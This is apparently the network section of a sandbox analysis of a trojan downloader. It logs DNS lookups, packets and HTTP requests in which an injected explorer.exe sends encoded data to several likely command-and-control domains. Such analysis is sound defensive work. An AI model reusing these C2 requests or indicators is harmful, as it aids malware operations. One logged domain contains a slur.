                                                                                      Oct 11, 2022 05:55:40.046801090 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.046842098 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.047013998 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:40.047054052 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.047075987 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.047116041 CEST44349700144.76.136.153192.168.2.4
                                                                                      Oct 11, 2022 05:55:40.047138929 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:40.047156096 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:40.047184944 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:55:40.057466030 CEST49700443192.168.2.4144.76.136.153
                                                                                      Oct 11, 2022 05:56:51.607481956 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:51.779848099 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:51.780102015 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:52.316946983 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:52.488960028 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583540916 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583606958 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583636999 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583662033 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583687067 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:56:52.583897114 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:52.583897114 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:52.616374969 CEST4970180192.168.2.469.57.163.50
                                                                                      Oct 11, 2022 05:56:52.788305044 CEST804970169.57.163.50192.168.2.4
                                                                                      Oct 11, 2022 05:57:02.810306072 CEST4970280192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:02.916558981 CEST804970252.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:02.916804075 CEST4970280192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:02.917025089 CEST4970280192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:03.023308992 CEST804970252.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:03.023365021 CEST804970252.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:03.023391008 CEST804970252.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:03.023504972 CEST4970280192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:03.929622889 CEST4970280192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:04.947115898 CEST4970380192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:05.053483009 CEST804970352.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:05.055026054 CEST4970380192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:05.055154085 CEST4970380192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:05.161349058 CEST804970352.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:05.161370039 CEST804970352.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:05.161392927 CEST804970352.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:05.161488056 CEST4970380192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:06.070801020 CEST4970380192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.091698885 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.197897911 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.198056936 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.202677965 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.308909893 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.308969975 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.308998108 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309022903 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309046984 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309070110 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309092999 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309123993 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309153080 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309180975 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309206009 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.309211969 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.309247017 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.309267998 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.415437937 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.415486097 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.415513039 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.415539026 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:07.415725946 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.415776968 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.422225952 CEST4970480192.168.2.452.60.87.163
                                                                                      Oct 11, 2022 05:57:07.528528929 CEST804970452.60.87.163192.168.2.4
                                                                                      Oct 11, 2022 05:57:12.524444103 CEST4970580192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:12.798453093 CEST8049705167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:12.798674107 CEST4970580192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:13.026810884 CEST4970580192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:13.301038027 CEST8049705167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:13.301083088 CEST8049705167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:13.301125050 CEST8049705167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:13.301240921 CEST4970580192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:14.078805923 CEST4970580192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:15.088702917 CEST4970680192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:15.361624956 CEST8049706167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:15.361727953 CEST4970680192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:15.362006903 CEST4970680192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:15.634841919 CEST8049706167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:15.634977102 CEST8049706167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:15.635019064 CEST8049706167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:15.635080099 CEST4970680192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:16.382733107 CEST4970680192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:17.389137030 CEST4970780192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:17.660954952 CEST8049707167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:17.661103010 CEST4970780192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:17.661243916 CEST4970780192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:17.933465004 CEST8049707167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:17.933495998 CEST8049707167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:17.933511019 CEST8049707167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:17.933805943 CEST4970780192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:17.935549021 CEST4970780192.168.2.4167.179.103.237
                                                                                      Oct 11, 2022 05:57:18.207227945 CEST8049707167.179.103.237192.168.2.4
                                                                                      Oct 11, 2022 05:57:23.003757954 CEST4970880192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:23.026202917 CEST8049708167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:23.026376963 CEST4970880192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:23.026679039 CEST4970880192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:23.048307896 CEST8049708167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:23.051944971 CEST8049708167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:23.051994085 CEST8049708167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:23.052162886 CEST4970880192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:24.041023970 CEST4970880192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:25.059305906 CEST4970980192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:25.081300974 CEST8049709167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:25.081429005 CEST4970980192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:25.081665993 CEST4970980192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:25.103414059 CEST8049709167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:25.105431080 CEST8049709167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:25.105467081 CEST8049709167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:25.105709076 CEST4970980192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:26.087822914 CEST4970980192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.104281902 CEST4971080192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.126667976 CEST8049710167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:27.126858950 CEST4971080192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.127089977 CEST4971080192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.149111032 CEST8049710167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:27.150600910 CEST8049710167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:27.150641918 CEST8049710167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:27.150966883 CEST4971080192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.154759884 CEST4971080192.168.2.4167.235.29.175
                                                                                      Oct 11, 2022 05:57:27.176949024 CEST8049710167.235.29.175192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.284390926 CEST4971180192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:32.305326939 CEST8049711217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.305466890 CEST4971180192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:32.305773973 CEST4971180192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:32.326670885 CEST8049711217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.367717981 CEST8049711217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.367748976 CEST8049711217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.367810011 CEST4971180192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:33.308125019 CEST4971180192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:34.327243090 CEST4971280192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:34.349548101 CEST8049712217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:34.359846115 CEST4971280192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:34.360590935 CEST4971280192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:34.381598949 CEST8049712217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:34.381963015 CEST8049712217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:34.382035017 CEST8049712217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:34.382076979 CEST4971280192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:35.371947050 CEST4971280192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.381433964 CEST4971380192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.402571917 CEST8049713217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:36.412471056 CEST4971380192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.412740946 CEST4971380192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.434798002 CEST8049713217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:36.435178995 CEST8049713217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:36.435208082 CEST8049713217.160.0.167192.168.2.4
                                                                                      Oct 11, 2022 05:57:36.435442924 CEST4971380192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.435631990 CEST4971380192.168.2.4217.160.0.167
                                                                                      Oct 11, 2022 05:57:36.456427097 CEST8049713217.160.0.167192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 11, 2022 05:55:38.107032061 CEST5968353192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:55:38.124008894 CEST53596838.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:56:51.525070906 CEST6416753192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:56:51.554538012 CEST53641678.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:57:02.652471066 CEST5856553192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:57:02.807224035 CEST53585658.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:57:12.465046883 CEST5223953192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:57:12.489001989 CEST53522398.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:57:22.953033924 CEST5680753192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:57:23.002239943 CEST53568078.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:57:32.253392935 CEST6100753192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:57:32.283051968 CEST53610078.8.8.8192.168.2.4
                                                                                      Oct 11, 2022 05:57:41.443650961 CEST6068653192.168.2.48.8.8.8
                                                                                      Oct 11, 2022 05:57:41.480459929 CEST53606868.8.8.8192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 11, 2022 05:55:38.107032061 CEST192.168.2.48.8.8.80xc273Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:56:51.525070906 CEST192.168.2.48.8.8.80x85d1Standard query (0)www.negerbajs.infoA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:02.652471066 CEST192.168.2.48.8.8.80x8c00Standard query (0)www.augusta.brokerA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:12.465046883 CEST192.168.2.48.8.8.80xb03cStandard query (0)www.luregirl.netA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:22.953033924 CEST192.168.2.48.8.8.80x7828Standard query (0)www.bloopacts.liveA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:32.253392935 CEST192.168.2.48.8.8.80x9274Standard query (0)www.skyepattest.comA (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:41.443650961 CEST192.168.2.48.8.8.80x96e8Standard query (0)www.suatvthainguyen.buzzA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 11, 2022 05:55:38.124008894 CEST8.8.8.8192.168.2.40xc273No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:56:51.554538012 CEST8.8.8.8192.168.2.40x85d1No error (0)www.negerbajs.info69.57.163.50A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:02.807224035 CEST8.8.8.8192.168.2.40x8c00No error (0)www.augusta.broker52.60.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:12.489001989 CEST8.8.8.8192.168.2.40xb03cNo error (0)www.luregirl.netluregirl.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:12.489001989 CEST8.8.8.8192.168.2.40xb03cNo error (0)luregirl.net167.179.103.237A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:23.002239943 CEST8.8.8.8192.168.2.40x7828No error (0)www.bloopacts.live167.235.29.175A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:32.283051968 CEST8.8.8.8192.168.2.40x9274No error (0)www.skyepattest.com217.160.0.167A (IP address)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:41.480459929 CEST8.8.8.8192.168.2.40x96e8No error (0)www.suatvthainguyen.buzzsuatvthainguyen.buzzCNAME (Canonical name)IN (0x0001)false
                                                                                      Oct 11, 2022 05:57:41.480459929 CEST8.8.8.8192.168.2.40x96e8No error (0)suatvthainguyen.buzz198.252.98.107A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • transfer.sh
                                                                                      • www.negerbajs.info
                                                                                      • www.augusta.broker
                                                                                      • www.luregirl.net
                                                                                      • www.bloopacts.live
                                                                                      • www.skyepattest.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.449699144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.449700144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.449709167.235.29.17580C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:25.081665993 CEST417OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.bloopacts.live
                                                                                      Connection: close
                                                                                      Content-Length: 188
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.bloopacts.live
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.bloopacts.live/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 42 4f 78 4b 4e 41 70 66 67 58 74 43 4e 43 76 30 73 6e 59 41 62 6e 39 4b 56 37 47 33 4f 63 4f 75 36 35 32 57 38 36 7a 5f 4e 52 37 52 67 35 33 5f 66 54 4c 2d 49 4b 50 72 61 46 6a 65 67 59 74 61 31 45 4e 6b 75 58 59 54 61 66 43 6a 5a 48 61 79 50 57 44 30 56 4d 55 6f 4b 79 74 79 6a 42 58 42 28 6a 52 44 44 51 6e 37 5a 5f 55 4c 43 51 6b 69 44 6f 66 76 42 4a 7e 4e 70 6a 5a 65 46 46 46 38 48 34 48 6a 66 52 6b 35 4d 70 6f 55 79 56 45 55 31 6c 43 67 6a 37 63 6d 72 4b 69 38 50 6f 35 70 59 39 76 43 70 72 4e 39 7e 73 68 38 4d 63 6e 71 59 77 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=BOxKNApfgXtCNCv0snYAbn9KV7G3OcOu652W86z_NR7Rg53_fTL-IKPraFjegYta1ENkuXYTafCjZHayPWD0VMUoKytyjBXB(jRDDQn7Z_ULCQkiDofvBJ~NpjZeFFF8H4HjfRk5MpoUyVEU1lCgj7cmrKi8Po5pY9vCprN9~sh8McnqYw).
                                                                                      Oct 11, 2022 05:57:25.105431080 CEST417INHTTP/1.1 200 OK
                                                                                      Date: Tue, 11 Oct 2022 03:57:25 GMT
                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                      X-Powered-By: PHP/7.1.33
                                                                                      Content-Length: 195
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      11192.168.2.449710167.235.29.17580C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:27.127089977 CEST418OUTGET /obc0/?-Zbh98=MMZqO1I08y1GBRfD5BQQX3BCGY/GGPyfy+PmyLieMA7AvKnTbkXoUfvxfVWp1ohOvSFQ0Ck6defUcVisMCvldqUqNSR/syiy4w==&C0=X82hHfExC6QP HTTP/1.1
                                                                                      Host: www.bloopacts.live
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Oct 11, 2022 05:57:27.150600910 CEST418INHTTP/1.1 200 OK
                                                                                      Date: Tue, 11 Oct 2022 03:57:27 GMT
                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                      X-Powered-By: PHP/7.1.33
                                                                                      Content-Length: 195
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      12192.168.2.449711217.160.0.16780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Oct 11, 2022 05:57:32.305773973 CEST420OUTPOST /obc0/ HTTP/1.1
                                                                                      Host: www.skyepattest.com
                                                                                      Connection: close
                                                                                      Content-Length: 412
                                                                                      Cache-Control: no-cache
                                                                                      Origin: http://www.skyepattest.com
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://www.skyepattest.com/obc0/
                                                                                      Accept-Language: en-US
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Data Raw: 2d 5a 62 68 39 38 3d 32 4e 36 6e 38 5f 43 6b 75 48 53 35 63 64 6f 69 41 70 32 2d 42 32 28 50 39 63 36 58 79 69 49 52 71 56 76 76 45 31 68 74 76 51 53 52 32 2d 71 45 54 51 6a 68 32 6e 28 30 64 62 6c 64 28 77 67 6a 6f 6c 37 56 63 54 68 59 77 30 79 47 6f 31 35 79 79 43 35 39 62 54 72 38 66 39 31 58 59 51 58 72 5a 46 59 65 5a 78 52 65 32 4f 66 52 6f 55 49 31 4e 33 6a 66 67 4f 61 72 48 33 79 67 33 35 4e 59 42 6d 6c 59 6a 5f 5a 6b 50 49 68 51 31 5f 5a 41 68 34 74 4c 30 34 4e 6d 7a 55 57 64 51 52 54 31 52 4a 4a 38 48 70 62 45 79 45 30 70 66 49 50 45 64 45 4f 74 37 65 73 68 72 6c 58 57 42 6a 7e 4c 64 65 4c 50 5a 59 33 58 4b 6f 51 76 73 54 45 6c 66 69 52 39 6c 62 50 46 54 6b 79 69 28 31 55 35 75 35 4d 5f 73 53 4c 4a 71 6a 73 57 46 62 38 6a 49 41 34 69 77 4a 65 4c 75 57 58 38 61 5f 49 4c 4a 66 65 74 37 34 78 53 35 66 4b 6c 50 76 49 79 31 69 42 4f 69 79 4b 51 4d 76 43 42 6c 42 69 50 59 7a 6f 74 76 33 56 41 6e 37 35 32 44 73 52 58 75 6f 4c 76 61 38 48 49 53 61 6f 68 67 42 39 31 70 70 46 5a 35 6b 55 6c 56 4f 6f 6e 58 35 72 78 6c 55 50 33 62 47 71 55 63 52 49 4e 4f 4a 73 59 70 33 58 74 65 65 37 63 44 39 61 74 48 48 41 41 38 4d 57 34 4b 51 66 71 50 68 41 33 39 75 6a 77 61 63 42 42 4c 72 44 63 79 69 43 4b 47 72 62 62 54 67 29 2e 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: -Zbh98=2N6n8_CkuHS5cdoiAp2-B2(P9c6XyiIRqVvvE1htvQSR2-qETQjh2n(0dbld(wgjol7VcThYw0yGo15yyC59bTr8f91XYQXrZFYeZxRe2OfRoUI1N3jfgOarH3yg35NYBmlYj_ZkPIhQ1_ZAh4tL04NmzUWdQRT1RJJ8HpbEyE0pfIPEdEOt7eshrlXWBj~LdeLPZY3XKoQvsTElfiR9lbPFTkyi(1U5u5M_sSLJqjsWFb8jIA4iwJeLuWX8a_ILJfet74xS5fKlPvIy1iBOiyKQMvCBlBiPYzotv3VAn752DsRXuoLva8HISaohgB91ppFZ5kUlVOonX5rxlUP3bGqUcRINOJsYp3Xtee7cD9atHHAA8MW4KQfqPhA39ujwacBBLrDcyiCKGrbbTg).
                                                                                      Oct 11, 2022 05:57:32.367717981 CEST420INHTTP/1.1 302 Moved Temporarily
                                                                                      Server: nginx
                                                                                      Date: Tue, 11 Oct 2022 03:57:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      Location: https://www.skyepattest.com/obc0/
                                                                                      Expires: Tue, 11 Oct 2022 04:17:32 GMT
                                                                                      Cache-Control: max-age=1200
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      13192.168.2.449712217.160.0.16780C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
